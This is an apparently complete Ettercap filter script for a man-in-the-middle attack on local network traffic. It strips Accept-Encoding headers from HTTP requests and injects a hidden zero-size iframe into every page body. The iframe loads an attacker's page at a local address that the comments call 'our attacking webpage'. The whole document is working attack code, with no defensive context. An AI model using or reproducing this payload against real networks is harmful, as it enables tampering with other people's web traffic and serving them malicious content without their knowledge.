if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) {
#...and if it contains an Accept-Encoding header...
if (search(DATA.data, "Accept-Encoding")) {
#...remove any Encoding (make sure we are using plain text)
replace("Accept-Encoding", "Accept-Nothing!");
}
}
#--Inject Iframe--
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) {
if (search(DATA.data, "<body>")){
#Replace it with the body tag and an iframe to our attacking webpage
replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />");
msg("iframe injected after <body>\n");
}
if (search(DATA.data, "<BODY>")){
replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />");
msg("iframe injected after <BODY>\n");
}
}
